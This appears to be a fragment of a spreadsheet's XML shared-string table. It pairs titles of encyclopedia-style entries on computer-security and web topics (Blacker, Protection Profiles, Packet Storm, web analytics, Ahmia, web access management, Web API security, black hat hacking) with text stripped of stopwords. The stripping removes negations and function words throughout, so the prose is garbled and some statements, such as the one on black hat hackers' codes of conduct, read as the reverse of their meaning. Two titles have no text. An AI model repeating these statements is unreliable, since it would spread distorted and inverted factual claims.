    <t>blacker (styled blacker) u.s. department defense computer network security project designed achieve class ratings (very high assurance) trusted computer system evaluation criteria (tcsec).the first blacker program began late 1970s, follow-on eventually producing fielded devices late 1980s. first secure system trusted end-to-end encryption united states' defense data network.the project implemented (software) burroughs (hardware), merger, resultant company unisys. also red/black concept segregation sensitive plaintext information (red signals) encrypted ciphertext (black signals) references</t>
  </si>
  <si>
    <t>Protection Profile</t>
  </si>
  <si>
    <t>protection profile (pp) document used part certification process according iso/iec 15408 common criteria (cc). generic form security target (st), typically created user user community provides implementation independent specification information assurance security requirements. combination threats, security objectives, assumptions, security functional requirements (sfrs), security assurance requirements (sars) rationales. specifies generic security evaluation criteria substantiate vendors' claims given family information system products. among others, typically specifies evaluation assurance level (eal), number indicating depth rigor security evaluation, usually form supporting documentation testing, product meets security requirements specified national institute standards technology (nist) national security agency (nsa) agreed cooperate development validated u.s. government pps. purpose states security problem rigorously given collection system products, known target evaluation (toe) specify security requirements address problem without dictating requirements implemented. inherit requirements pps. order product evaluated certified according product vendor define security target (st) comply pps. serve template product's problem areas although easiest laymen compare, simplicity deceptive number rather meaningless without understanding security implications pp(s) used evaluation. technically, comparing evaluated products requires assessing functional requirements. unfortunately, interpreting security implications intended application requires strong security expertise. evaluating product thing, deciding product's evaluation adequate particular application quite another. obvious trusted agency possesses depth security expertise needed evaluate systems applicability common criteria evaluated products. problem applying evaluations new. this problem addressed decades massive research project defined software features could protect information, evaluated strength, mapped security features needed specific operating environment risks. results documented rainbow series. rather separating functional requirements, orange book followed less advanced approach defining functional protection capabilities appropriate assurance requirements single category. seven categories defined way. further, yellow book defined matrix security environments assessed risk each. established precisely security environment valid orange book categories. this approach produced unambiguous layman's cookbook determine whether product usable particular application. loss application technology seems unintended consequence superseding orange book common criteria. security devices validated u.s. government anti-virus (sunset date: 2011.06.01) recovery certification authorities tokens dbms firewalls operating system ids/h validated non-u.s. government smart cards remote electronic voting systems trusted execution environment external links international protection profiles niap protection profiles computer security 1987 references</t>
  </si>
  <si>
    <t>Packet Storm</t>
  </si>
  <si>
    <t>packet storm security information security website offering current historical computer security tools, exploits, security advisories. operated group security enthusiasts publish security information offer tools educational testing purposes. overview site originally created williams sold 1999 kroll o'gara year later, given back security community. while kroll o'gara, packet storm awarded mixter $10,000 whitepaper contest dedicated mitigation distributed denial service attacks. today, offer suite consulting services site referenced hundreds books.in 2013, packet storm launched bounty program working exploits would given back community testing purposes. later year, worked security researcher help expose large scale shadow profile issue popular internet site facebook. after facebook claimed million people affected, additional testing packet storm exposed numbers accurately reported. references external links official website</t>
  </si>
  <si>
    <t>Protection mechanism</t>
  </si>
  <si>
    <t>computer science, protection mechanisms built computer architecture support enforcement security policies. simple definition security policy information computer system".the access matrix model, first introduced 1971, generalized description operating system protection mechanisms.the separation protection security special case separation mechanism policy. notes references anita jones, richard lipton enforcement security policies computation symposium operating systems principles. proceedings fifth symposium operating systems principles. austin, texas, united states. 197–206. 1975 lampson, butler (1971). "protection". proceedings princeton conference information sciences systems. 437. carl landwehr formal models computer security volume issue (september 1981) 247–278 wulf, cohen; corwin; jones; levin; pierson; pollack (june 1974). "hydra: kernel multiprocessor operating system". communications acm. (6): 337–345. doi:10.1145/355616.364017.</t>
  </si>
  <si>
    <t>Web analytics</t>
  </si>
  <si>
    <t>analytics measurement, collection, analysis, reporting data understand optimize usage. analytics process measuring traffic used tool business market research assess improve website effectiveness. analytics applications also help companies measure results traditional print broadcast advertising campaigns. used estimate traffic website changes launching advertising campaign. analytics provides information number visitors website number page views, create user behavior profiles. helps gauge traffic popularity trends, useful market research. basic steps analytics process most analytics processes come four essential stages steps, are: collection data: this stage collection basic, elementary data. usually, data counts things. objective stage gather data. processing data information: this stage usually takes counts makes ratios, although still counts. objective stage take data conform information, specifically metrics. developing kpi: this stage focuses using ratios (and counts) infusing business strategies, referred performance indicators (kpi). many times, kpis deal conversion aspects, always. depends organization. formulating online strategy: this stage concerned online goals, objectives, standards organization business. these strategies usually related making money, saving money, increasing market share.another essential function developed analysts optimization websites experiments experiments testing: testing controlled experiment variants, online settings, development.the goal testing identify suggest changes pages increase maximize effect statistically tested result interest. each stage impacts impact (i.e., drives) stage preceding following sometimes data available collection impacts online strategy. other times, online strategy affects data collected. analytics technologies there least categories analytics, off-site on-site analytics. off-site analytics refers measurement analysis regardless whether person owns maintains website. includes measurement website's potential audience (opportunity), share voice (visibility), buzz (comments) happening internet whole. on-site analytics, common two, measure visitor's behavior specific website. this includes drivers conversions; example, degree different landing pages associated online purchases. on-site analytics measures performance specific website commercial context. this data typically compared performance indicators performance used improve website marketing campaign's audience response. google analytics adobe analytics widely used on-site analytics service; although tools emerging provide additional layers information, including heat maps session replay.historically, analytics used refer on-site visitor measurement. however, meaning become blurred, mainly vendors producing tools span categories. many different vendors provide on-site analytics software services. there main technical ways collecting data. first traditional method, server file analysis, reads logfiles server records file requests browsers. second method, page tagging, uses javascript embedded webpage make image requests third-party analytics-dedicated server, whenever webpage rendered browser desired, mouse click occurs. both collect data processed produce traffic reports. analytics data sources fundamental goal analytics collect analyze data related traffic usage patterns. data mainly comes four sources: direct http request data: directly comes http request messages (http request headers). network-level server-generated data associated http requests: part http request, required successful request transmissions example, address requester. application-level data sent http requests: generated processed application-level programs (such javascript, php, asp.net), including sessions referrals. these usually captured internal logs rather public analytics services. external data: combined on-site data help augment website behavior data described interpret usage. example, addresses usually associated geographic regions internet service providers, e-mail open click-through rates, direct mail campaign data, sales, lead history, data types needed. server file analysis servers record transactions file. soon realized files could read program provide data popularity website. thus arose analysis software. early 1990s, website statistics consisted primarily counting number client requests hits) made server. this reasonable method initially since website often consisted single html file. however, introduction images html, websites spanned multiple html files, count became less useful. first true commercial analyzer released ipro 1994.two units measure introduced mid-1990s gauge accurately amount human activity servers. these page views visits sessions). page view defined request made server page, opposed graphic, visit defined sequence requests uniquely identified client expired certain amount inactivity, usually minutes. emergence search engine spiders robots late 1990s, along proxies dynamically assigned addresses large companies isps, made difficult identify unique human visitors website. analyzers responded tracking visits cookies, ignoring requests known spiders.the extensive caches also presented problem file analysis. person revisits page, second request often retrieved browser's cache, request received server. this means person's path site lost. caching defeated configuring server, result degraded performance visitor bigger load servers. page tagging concerns accuracy file analysis presence caching, desire able perform analytics outsourced service, second data collection method, page tagging "web beacons". mid-1990s, counters commonly seen images included page showed number times image requested, estimate number visits page. late 1990s, concept evolved include small invisible image instead visible one, and, using javascript, pass along image request certain information page visitor. this information processed remotely analytics company, extensive statistics generated. analytics service also manages process assigning cookie user, uniquely identify visit subsequent visits. cookie acceptance rates vary significantly websites affect quality data collected reported. collecting website data using third-party data collection server even in-house data collection server) requires additional lookup user's computer determine address collection server. occasion, delays completing successful failed lookups result data collected. with increasing popularity ajax-based solutions, alternative invisible image implement call back server rendered page. case, page rendered browser, piece javascript code would call back server pass information client aggregated analytics company. logfile analysis page tagging both logfile analysis programs page tagging solutions readily available companies wish perform analytics. cases, analytics company offer approaches. question arises method company choose. there advantages disadvantages approach. advantages logfile analysis main advantages file analysis page tagging follows: server normally already produces files, data already available. changes website required. data company's servers standard, rather proprietary, format. this makes easy company switch programs later, several different programs, analyze historical data program. files contain information visits search engine spiders, generally excluded analytics tools using javascript tagging. (some search engines might even execute javascript page.) although reported part human activity, useful information search engine optimization. files require additional lookups slow starts. thus external server calls slow page load speeds, result uncounted page views. server reliably records every transaction makes, e.g. serving documents content generated scripts, rely visitors' browsers cooperating. advantages page tagging main advantages page tagging file analysis follows: counting activated opening page (given client runs scripts), requesting server. page cached, counted server-based analysis. cached pages account one-third page views, negatively impact many site metrics. data gathered component ("tag") page, usually written javascript. typically used conjunction server-side scripting language (such php) manipulate (usually) store database. script access additional information client user, sent query, visitors' screen sizes price goods purchased. page tagging report events involve request server, interactions within flash movies, partial form completion, mouse events onclick, onmouseover, onfocus, onblur, etc. page tagging service manages process assigning cookies visitors; file analysis, server configured this. page tagging available companies access servers. lately, page tagging become standard analytics. economic factors logfile analysis almost always performed in-house. page tagging performed in-house, often provided third-party service. economic difference models also consideration company deciding purchase. logfile analysis typically involves one-off software purchase; however, vendors introducing maximum annual page views additional costs process additional information. addition commercial offerings, several open-source logfile analysis tools available free charge. logfile analysis data must stored archived, often grows large quickly. although cost hardware minimal, overhead department considerable. logfile analysis software need maintained, including updates security patches. complex page tagging vendors charge monthly based volume i.e. number page views month collected.which solution cheaper implement depends amount technical expertise within company, vendor chosen, amount activity seen websites, depth type information sought, number distinct websites needing statistics. regardless vendor solution data collection method employed, cost visitor analysis interpretation also included. that cost turning data actionable information. this third party consultants, hiring experienced analyst, training suitable in-house person. cost-benefit analysis performed. example, revenue increase cost savings gained analyzing visitor data? hybrid methods some companies produce solutions collect data files page tagging analyze kinds. using hybrid method, produce accurate statistics either method own. early hybrid solution produced 1998 rufus evison. geolocation visitors with geolocation, possible track visitors' locations. using geolocation database api, visitors geolocated city, region, country level.ip intelligence, internet protocol (ip) intelligence, technology maps internet categorizes addresses parameters geographic location (country, region, state, city postcode), connection type, internet service provider (isp), proxy information, more. first generation intelligence referred geotargeting geolocation technology. this information used businesses online audience segmentation applications online advertising, behavioral targeting, content localization website localization), digital rights management, personalization, online fraud detection, localized search, enhanced analytics, global traffic management, content distribution. click analytics click analytics, also known clickstream special type analytics gives special attention clicks. commonly, click analytics focuses on-site analytics. editor website uses click analytics determine performance particular site, regards users site clicking. also, click analytics happen real-time "unreal"-time, depending type information sought. typically, front-page editors high-traffic news media sites want monitor pages real-time, optimize content. editors, designers types stakeholders analyze clicks wider time frame help assess performance writers, design elements advertisements etc. data clicks gathered least ways. ideally, click "logged" occurs, method requires functionality picks relevant information event occurs. alternatively, institute assumption page view result click, therefore simulated click page view. customer lifecycle analytics customer lifecycle analytics visitor-centric approach measuring falls umbrella lifecycle marketing. page views, clicks events (such calls, access third-party services, etc.) tied individual visitor instead stored separate data points. customer lifecycle analytics attempts connect data points marketing funnel offer insights visitor behavior website optimization. other methods other methods data collection sometimes used. packet sniffing collects data sniffing network traffic passing server outside world. packet sniffing involves changes pages servers. integrating analytics webserver software also possible. both methods claim provide better real-time data methods. on-site analytics metrics there globally agreed definitions within analytics industry bodies trying agree definitions useful definitive time. main bodies input area (interactive advertising bureau), jicwebs (the joint industry committee standards ireland), (digital analytics association), formally known (web analytics association, us). however, many terms used consistent ways major analytics tool another, following list, based conventions, useful starting point: bounce rate percentage visits single-page visits without interactions (clicks) page. words, single click particular session called bounce. click path chronological sequence page views within visit session. request file webserver. available analysis. number hits received website frequently cited assert popularity, number extremely misleading dramatically overestimates popularity. single web-page typically consists multiple (often dozens) discrete files, counted page downloaded, number hits really arbitrary number reflective complexity individual pages website website's actual popularity. total number visits page views provides realistic accurate assessment popularity. page view request file, sometimes event mouse click, defined page setup analytics tool. occurrence script page tagging. analysis, single page view generate multiple hits resources required view page (images, .css files) also requested webserver. visitor/unique visitor/unique user uniquely identified client generating page views hits within defined period time (e.g. day, week month). uniquely identified client usually combination machine (one's desktop computer work example) browser (firefox machine). identification usually persistent cookie placed computer site page code. older method, used file analysis, unique combination computer's address user-agent (browser) information provided server browser. important understand "visitor" human sitting computer time visit, since individual human different computers computer, different browsers, seen different visitor circumstance. increasingly, still, somewhat rarely, visitors uniquely identified flash lso's (local shared objects), less susceptible privacy enforcement. visit/session visit session defined series page requests case tags, image requests uniquely identified client. unique client commonly identified address unique placed browser cookie. visit considered ended requests recorded number elapsed minutes. 30-minute limit ("time out") used many analytics tools can, tools (such google analytics), changed another number minutes. analytics data collectors analysis tools reliable knowing visitor looked sites page views; visit considered visit long events (page views, clicks, whatever recorded) minutes less close together. note visit consist one-page view thousands. unique visit session also extended time page loads indicates visitor viewing pages continuously. active time/engagement time average amount time visitors spend actually interacting content page, based mouse moves, clicks, hovers, scrolls. unlike session duration page view duration/time page, metric accurately measure length engagement final page view, available many analytics tools data collection methods. average page depth/page views average session page depth approximate "size" average visit, calculated dividing total number page views total number visits. average page view duration average amount time visitors spend average page site. click "refers single instance user following hyperlink page site another". event discrete action class actions occur website. page view type event. events also encapsulate clicks, form submissions, keypress events, client-side user actions. exit rate/% exit statistic applied individual page, site. percentage visits seeing page page final page viewed visit. first visit/first session (also called 'absolute unique visitor' tools) visit uniquely identified client theoretically made previous visits. since knowing whether uniquely identified client site presence persistent cookie digital fingerprinting received previous visit, first visit label reliable site's cookies deleted since previous visit. frequency/session unique frequency measures often visitors come website given time period. calculated dividing total number sessions visits) total number unique visitors specified time period, month year. sometimes used interchangeable term "loyalty." impression common definition impression instance advertisement appearing viewed page. note advertisement displayed viewed page area actually displayed screen, measures impressions necessarily mean advertisement view-able. visitor visitor made previous visits. this definition creates certain amount confusion (see common confusions below), sometimes substituted analysis first visits. page time viewed/page visibility time/page view duration time single page blog, banner) screen, measured calculated difference time request page time next recorded request. next recorded request, viewing time instance page included reports. repeat visitor visitor made least previous visit. period last current visit called visitor recency measured days. return visitor unique visitor activity consisting visit site reporting period unique visitor visited site prior reporting period. individual counted reporting period. session duration/visit duration average amount time visitors spend site time visit. calculated total duration sessions divided total number sessions. this metric complicated fact analytics programs measure length final page view. single page visit/singleton visit single page viewed (this 'bounce'). site overlay report technique statistics (clicks) spots superimposed, physical location, visual snapshot page. click-through rate ratio users click specific link number total users view page, email, advertisement. commonly used measure success online advertising campaign particular website well effectiveness email campaigns. off-site analytics off-site analytics based open data analysis, social media exploration, share voice properties. usually used understand market site identifying keywords tagged site, either social media websites. common sources confusion analytics hotel problem hotel problem generally first problem encountered user analytics. problem unique visitors month total unique visitors month. this appears inexperienced user problem whatever analytics software using. fact simple property metric definitions. picture situation imagining hotel. hotel rooms (room room table shows, hotel unique users three days. totals respect days therefore six. during period room unique users. totals respect rooms therefore four. actually three visitors hotel period. problem person stays room nights counted twice counted day, counted total period looked software analytics correctly chosen time period, thus leading problem user tries compare totals. analytics poisoning internet matured, proliferation automated traffic become increasing problem reliability analytics. bots traverse internet, render documents ways similar organic users, result incidentally trigger code analytics count traffic. jointly, incidental triggering analytics events impacts interpretability data inferences made upon data. provided proof concept google analytics well competitors easily triggered common deployment strategies. analytics methods problems cookies historically, vendors page-tagging analytics solutions used third-party cookies sent vendor's domain instead domain website browsed. third-party cookies handle visitors cross multiple unrelated domains within company's site, since cookie always handled vendor's servers. however, third-party cookies principle allow tracking individual user across sites different companies, allowing analytics vendor collate user's activity sites provided personal information activity sites thought anonymous. although analytics companies deny this, companies companies supplying banner done privacy concerns cookies therefore noticeable minority users block delete third-party cookies. 2005, reports showed internet users blocked third-party cookies deleted least month. most vendors page tagging solutions moved provide least option using first-party cookies (cookies assigned client subdomain). another problem cookie deletion. when analytics depend cookies identify unique visitors, statistics dependent persistent cookie hold unique visitor when users delete cookies, usually delete first- third-party cookies. done interactions site, user appear first-time visitor next interaction point. without persistent unique visitor conversions, click-stream analysis, metrics dependent activities unique visitor time, cannot accurate. cookies used addresses always unique users shared large groups proxies. cases, address combined user agent order accurately identify visitor cookies available. however, partially solves problem often users behind proxy server user agent. other methods uniquely identifying user technically challenging would limit trackable audience would considered suspicious. cookies reach lowest common denominator without using technologies regarded spyware. secure analytics (metering) methods good aware third-party information gathering subject network limitations security applied. countries, service providers private networks prevent site visit data going third parties. methods described (and methods mentioned here, like sampling) central problem vulnerable manipulation (both inflation deflation). this means methods imprecise insecure reasonable model security). this issue addressed several papers, date solutions suggested papers remain theoretical, possibly lack interest engineering community, financial gain current situation provides owners websites. details, consult aforementioned papers. also list analytics software mobile analytics online video analytics post-click marketing analysis software mining traffic references bibliography clifton, brian (2010) advanced metrics google analytics, edition, sybex (paperback.) kaushik, avinash (2009) analytics online accountability science customer centricity. sybex, wiley. mortensen, dennis (2009) yahoo! analytics. sybex. farris, bendle, n.t., pfeifer, p.e. reibstein, d.j. (2009) marketing metrics metrics every manager needs know, prentice hall, london. plaza, (2009) monitoring traffic source effectiveness google analytics: experiment time series. aslib proceedings, 61(5): 474–482. arikan, akin (2008) multichannel marketing. metrics methods offline success. sybex. tullis, albert, bill (2008) measuring user experience. collecting, analyzing presenting usability metrics. morgan kaufmann, elsevier, burlington kaushik, avinash (2007) analytics: hour day, sybex, wiley. bradley (2007) marketing research. tools techniques. oxford university press, oxford. sostre, pedro leclaire, jennifer (2007) analytics dummies. wiley. burby, jason atchison, shane (2007) actionable analytics: using data make smart business decisions. davis, (2006) ‘marketing metrics: create accountable marketing plans really work’ john wiley sons (asia). peterson eric (2005) site measurement hacks. o'reilly ebook. peterson eric (2004) analytics demystified: marketer's guide understanding your site affects your business. celilo group media lenskold, (2003) ‘marketing roi: plan, measure optimise strategies profit’ london: mcgraw hill contemporary sterne, (2002) metrics, proven methods measuring site success, london: john wiley sons. srinivasan, .(2001) commerce metrics, models examples, london: prentice hall. zheng, peltsverger, (2015) analytics overview, book: encyclopedia information science technology, third edition, publisher: global, editors: mehdi khosrow-pour</t>
  </si>
  <si>
    <t>Ahmia</t>
  </si>
  <si>
    <t>ahmia clearnet search engine tor's hidden services created juha nurmi. overview developed 2014 google summer code support project, open source search engine initially built django postgresql. collects peculiar anonymous identifier called .onion urls network feeds index except containing robots.txt file. search engine filters child pornography keeps blacklist abusive services.the service partners globaleaks's submissions tor2web statistics hidden service discovery july 2015 indexed 5000 sites. ahmia also affiliated hermes center transparency digital rights, organization promotes transparency freedom-enabling technologies.in july 2015 site published list hundreds fraudulent fake versions pages (including sites duckduckgo, well dark page). according nurmi, "someone runs fake site similar address original tries fool people that" intent scamming people (e.g. gathering bitcoin money spoofing bitcoin addresses). background photo site "hakaniemi helsinki". references</t>
  </si>
  <si>
    <t>Web access management</t>
  </si>
  <si>
    <t>access management (wam) form identity management controls access resources, providing authentication management, policy-based authorizations, audit reporting services (optional) single sign-on convenience. authentication management process determining user’s application’s) identity. this normally done prompting user name password. additional methods authentication also include access tokens (which generate one-time passwords) digital certificates. once user's process') identity confirmed, policy-based authorization comes play. resource policies attached e.g. "only allow internal employees access resource" and/or "only allow members admin group access resource." requested resource used look policy, policy evaluated user’s identity. user passes policy evaluation, she/he granted access resource. user fails evaluation, access denied. after authentication authorization policy decision made, outcome recorded auditing purposes, determining last login time user identifying attempts gain access protected resources logging administrative actionsas benefit user, access management product security together (which benefit administrative staff), offer single sign process user logs resource, automatically logged related resources. users inconvenienced attempting authenticated multiple websites throughout course (potentially different user names passwords). access management product record initial authentication, provide user cookie acts temporary token authentication protected resources, thereby requiring user once. history access management products originated late 1990s, known single sign five original products hewlett-packard icewall sso, technologies siteminder, oblix access manager, magnaquest technologies limited (identity access management) novell ichain. these products simple functional capabilities, solved important issue time share user credentials across multiple domains without forcing user once. challenge stemmed fact cookies domain-specific, simple seamlessly transfer user website another. term became known access management, products added functionality controlling resources (web pages) user could access, addition authenticating them. architectures there three different types architectures comes access management architectures: plug-in agent), proxy tokenization. plugins programs installed every web/application server, register servers, called every request page. they intercept request communicate external policy server make policy decisions. benefits plugin agent) based architecture highly customized unique needs particular server. drawbacks different plugin required every server every platform (and potentially every version every server). further, technology evolves, upgrades agents must distributed compatible evolving host software. proxy-based architectures differ requests routed proxy server back-end web/application servers. this provide universal integration servers since common standard protocol, http, used instead vendor-specific application programming interfaces (apis). drawbacks additional hardware usually required proxy servers. tokenization differs user receives token used directly access back-end web/application servers. architecture authentication occurs access management tool data flows around this removes network bottlenecks caused proxy-based architectures. drawbacks back-end web/application server must able accept token otherwise access management tool must designed common standard protocols. solutions like siteminder (now known single sign-on) offer agent proxy based options including standards based federation. maxecurity security employs proxy approach. netiq access manager offers hybrid solution consists proxy j2ee agent approaches. telegrid smrte employs tokenization approach. costs cases, annual maintenance costs dwarf purchase price. example, policy servers used plugin proxy-based architectures), high-end hardware needed order handle workload required access management infrastructure. centralized administration additional hidden cost, customers need hire train staff exclusively manage policy entitlements underlying applications. final hidden cost relates regulatory compliance. since access management similar concept firewall (more closely aligned application-layer firewall), must able handle major audit requirements, especially public companies subject sarbanes-oxley (not mention bound health insurance portability accountability act, pci, cpni). larger companies spend tremendous amounts time money auditing access management infrastructures since enforcement points many internal external applications. references external references access management, gartner glossary magnaquest technologies identity access management</t>
  </si>
  <si>
    <t>Packet Clearing House</t>
  </si>
  <si>
    <t>packet clearing house (pch) international nonprofit organization responsible providing operational support security critical internet infrastructure, including internet exchange points core domain name system. organization also works areas cybersecurity coordination, regulatory policy internet governance. overview packet clearing house (pch) formed 1994 chris alan mark kent provide efficient regional local network interconnection alternatives west coast united states. grown become leading proponent neutral independent network interconnection provider route-servers major exchange points worldwide. provides equipment, training, data, operational support organizations individual researchers seeking improve quality, robustness, internet accessibility. 2022, major projects include building supporting nearly half world's approximately internet exchange points (ixps), maintaining canonical index internet exchange points, data going back 1994; operating world's largest anycast domain name system (dns) server platform, including root nameservers, top-level domains (tlds) including country-code domains countries, quad9 recursive resolver; operating fips 140-2 level global dnssec management signing infrastructure, facilities singapore, zurich, jose; implementing network research data collection initiatives countries; publishing original research policy guidance areas telecommunications regulation, including 2011 2016 interconnection surveys, country reports canada 2012 2016 paraguay 2012, survey critical infrastructure experts gcsc; developing presenting educational materials foster better understanding internet architectural principles policy implications among policymakers, technologists, general public.notable past projects include inoc-dba critical infrastructure protection hotline communications system, operated brazilian cert. institutional donors, including soros open society institute, funded developing open source tools help internet service providers (isps) optimize traffic routing, reduce costs increase performance internet service delivered public; united nations development programme, cisco systems, ntt/verio, level equinix, governments sweden, denmark, canada, mexico, france, singapore, chile, switzerland, united states, hundreds internet service providers individuals. works closely united states telecommunications training institute (ustti) offer courses telecommunications regulation, internet infrastructure construction management, domain name system management, internet security coordination, three times year washington, d.c. also teaches on-location workshops year throughout world. locations maintains staffed offices paris, berkeley, dublin, kathmandu, johannesburg, khartoum, portland ottawa operates critical network infrastructure within internet exchange points. board directors pch's board directors consists steve feldman (chairman), dorian kim, bill woodcock (executive director). also quad9 references external links pch.net official website, including: looking glass servers white papers tutorials datasets establishment nepal internet exchange: interim report bill woodcock: internet odyssey</t>
  </si>
  <si>
    <t>WARP (information security)</t>
  </si>
  <si>
    <t>warning, advice reporting point (warp) community internal company-based service share advice information computer-based threats vulnerabilities. warps typically provide: warning filtered warning service, subscribers receive alerts advisory information subjects relevant them. advice advice brokering service, members respond questions trusted secure environment. reporting central collection information incidents problems trusted secure environment. collected information anonymised shared amongst membership.on average, warps cost much less computer emergency response centre, cert/cc us-cert. also information security management system british cyber security community external links warp official homepage downloadable toolbox</t>
  </si>
  <si>
    <t>Web API security</t>
  </si>
  <si>
    <t>security entails authenticating programs users invoking api. along ease integrations come difficulties ensuring proper authentication (authn) authorization (authz). multitenant environment, security controls based proper authn authz help ensure access limited need (and entitled appropriate authn schemes enable producers (apis services) properly identify consumers (clients calling programs), evaluate access level (authz). words, consumer invoke particular method (business logic) based credentials presented? "interface design flaws widespread, world crypto processors sundry embedded systems right antivirus software operating system itself." method authentication authorization most common methods authentication authorization include. static strings: these like passwords provided api's consumers. dynamic tokens: these time based tokens obtained caller authentication service. user-delegated tokens: these tokens oauth granted based user authentication. policy attribute-based access control: policies attributes define apis invoked using standards alfa xacml.the methods provide different level security ease integration. oftentimes, easiest method integration also offers weakest security model. static strings static strings method, caller client embeds string token request. this method often referred basic authentication. "from security point view, basic authentication satisfactory. means sending user's password network clear text every single page accessed (unless secure lower-level protocol, like ssl, used encrypt transactions). thus user vulnerable packet sniffers net." dynamic tokens when protected dynamic token, time-based nonce inserted token. token time live (ttl) client must acquire token. method time check algorithm, token expired, request forbidden. example token json token. "exp" (expiration time) claim identifies expiration time must accepted processing." user-delegated token this type token used three-legged systems application needs access behalf user. instead revealing user password application, user grants token encapsulates users permission application invoke api. oauth authorization framework enables third-party application obtain limited access http service, either behalf resource owner orchestrating approval interaction resource owner http service, allowing third-party application obtain access behalf. fine-grained authorization apis attribute-based access control approach, policy enforcement point either within itself, framework interceptor message handler), gateway (e.g. wso2, kong, similar) intercepts call response back api. converts authorization request (typically xacml) sends policy decision point (pdp) e.g. authzforce axiomatics. policy decision point configured policies implement dynamic access control number user, resource, action, context attributes define access allowed denied. policies about: resource (e.g. bank account) user (e.g. customer) context (e.g. time day) relationship (e.g. customer account belongs).policies expressed alfa xacml. references external links owasp security project security platform enterprise company wallarm pingintelligence noname security threatx</t>
  </si>
  <si>
    <t>Blackle</t>
  </si>
  <si>
    <t>blackle internet search engine powered google programmable search engine. blackle created tony heap heap media australia, aims save energy displaying black background grayish-white text color search results. blackle claims saved electrical energy january 2021. comparison, average american household consumes electrical energy year. concept concept behind blackle computer monitors made less energy displaying much darker colors. blackle based study tested variety monitors. however, claims disputed whether energy saving effects, especially users screens, constant backlight.this concept first brought attention heap media blog post, estimated google could save megawatt hours year utilizing screens. homepage blackle provides count number watt hours claimed saved enabling concept. history blackle launched january 2007. during time, blackle gained popularity featured multiple mainstream media outlets.blackle international, translated blackle portuguese, french, czech, italian, dutch retired 2019. while international page still every link listed experienced link rot. 2021, site available english. also light-on-dark color scheme performance watt references external links official website</t>
  </si>
  <si>
    <t>Black hat hacking</t>
  </si>
  <si>
    <t>black hacker black-hat hacker) hacker violates computer security personal profit malice. origin term's origin often attributed hacker culture theorist richard stallman (though denies coining contrast exploitative hacker white hacker hacks protectively drawing attention vulnerabilities computer systems require repair. black/white terminology originates western genre popular american culture, black white hats denote villainous heroic cowboys respectively, resemble contrast good evil.black hackers stereotypical illegal hacking groups often portrayed popular culture, "the epitome public fears computer criminal". black hackers break secure networks systems motive destroying, modifying, stealing sensitive data, make networks unusable authorized network users.unlike white hackers, black hackers common standardized code internal regulation. albeit, exist forms organization: black call centers, malicious software resellers vendors. also security hacker references</t>
  </si>
  <si>
    <t>Pink Meth</t>
  </si>
  <si>
    <t>Advanced disaster management simulator</t>
  </si>
  <si>
    <t>adms (advanced disaster management simulator) emergency disaster management training simulation system designed train incident commanders, first responders, incident command teams real-time, interactive virtual reality environment. adms first introduced environmental tectonics corporation (etcc:us) 1992. development adms response crash british airtours flight manchester airport 1985, people died. following accident research indicated first responder training include realistic scenarios. first adms system produced ministry defence, delivered royal force's (raf) manston facility. since inception, adms evolved modular, expandable disaster simulation platform, systems worldwide. history virtual reality emergency management training successful virtual reality simulation disaster management training initiatives popular area research. found trainees able participate, verbally physically training exercise, retention 90%, great contrast retention rate hear, retention rate hear.traditionally classroom lectures, tabletop exercises live-training drills utilized training. while teaching methodologies effective, virtual reality simulation seems bridged them. virtual reality offers opportunity create emergency situation could otherwise experienced safety, cost environmental factors. from safety standpoint, training synthetic environment allows student experiment carrying dangerous actions, offers ability repeat exercise trainee feels confident prepared real-life incidents. technology adms relies physics engine built artificial intelligence provide realistic, emergency situations. disaster scenarios include algorithms take account: type threat, time day, precipitation, wind, visibility, condition casualties, terrain, traffic bystander behavior adms training exercises unscripted open-ended, requiring interactive decision making participation users affect outcome training exercise. development, escalation, resolution situation determined trainees' decisions intelligent resources command. adms networked framework family applications single station multi-user system several networked stations giving independent access several viewpoints control interfaces within environment scenario. adms projects simulations using panoramic high-definition multimedia interface, visual displays directional sound. simulation engine includes models including: artificial intelligence, physics, logic, messaging applications comprising visual engine, sound engine, messaging daemon graphical user interface. environments adms environments developed either geo-typical geo-specific environments. geo-specific environments created using exact modeling specified location, include buildings, streets, vehicles, terrain people, specific airports schools, entire cities. products applications adms-command designed training incident commanders diverse range emergency scenarios, ranging accidents low-frequency, high casualty situations, either single multi-agency operations. trainees make decisions give verbal commands, enabling real-time action simulator. system expanded include additional simulation elements, including vehicle controls cabs, degree immersive visual displays. adms-drive designed train, assess recertify drivers safe effective driving procedures. also utilized training platform train emergency responders drive stressful situations, airport snow removal teams train snow removal operations winter conditions. adms-drive immerses user realistic, virtual environment dynamic elements traffic, signal lights, people weather create realistic challenging representation situation. adms-arff designed aircraft rescue firefighting vehicle simulator focuses correct turret operation, driving communication, vehicle positioning, firefighting turrets command control. trainee uses controls joysticks maneuver vehicle airport environment deals airplane disaster. adms-hret hret (high-reach extendable turret) intended training operators become familiar with, enhance skills necessary actual hands operation rosenbauer hret. hret portable desktop system comes console includes real hret-joystick relevant switches. trainees drive scene, train various external internal fire scenarios, penetrate aircraft using piercing device. adms-bart behavioral assessment research tool (bart) developed initially netherlands institute safety, research department. bart focuses human behavior effect real-life incident. adms-bart creates environment virtual human subjects would live situation. this system made possible virtual reality studying virtual behaviors fires, allowing changes live environment mitigate damages event live incident. adms-us standardized simulation system, programmed geo-typical situation environments resemble anytown usa. adms-us portable, laptop based simulator utilized either individual multi-agency training require geo-specific capabilities. compliance january 2009, u.s. army program executive office simulation, training instrumentation (peo stri) awarded stoc eligibility adms. stoc id/iq (indefinite delivery/indefinite quantity) contract vehicle ceiling $17.5 billion period years. branches military eligible utilize stoc quickly obtain simulation training solutions panel pre-qualified companies. purpose contract vehicle provide efficient method u.s. military coalition service members acquire need. additionally, adms designed nims compliant. national incident management system developed unified approach allow governmental agencies work unison private sector common goal preparing for, preventing, responding recovering from, mitigating effects incidents cause, size, location, complexity. users york city office emergency management rochester fire department public safety training facility (pstf) rochester, minneapolis paul international airport florida state fire college netherlands institute safety (nifv) south korea national fire service academy (sfnfsa) pennsylvania southeast region counter terrorism task force aurora community college butler county community college noblesville fire department pinellas park high school rosenbauer rockland county york fire academy references external links environmental tectonics corporation's website environmental tectonics corporation, simulation division website adms wpix news channel york</t>
  </si>
  <si>
    <t>Package pilferage</t>
  </si>
  <si>
